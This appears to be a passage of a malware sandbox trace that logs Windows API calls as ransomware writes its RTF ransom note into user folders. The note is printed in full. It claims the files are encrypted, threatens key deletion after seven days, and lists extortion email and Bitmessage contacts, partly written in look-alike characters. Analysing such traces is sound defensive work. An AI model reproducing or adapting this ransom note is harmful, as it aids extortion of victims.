lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.596] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.599] CloseHandle (hObject=0x294) returned 1 [0297.599] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0297.599] GetLastError () returned 0x2 [0297.599] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 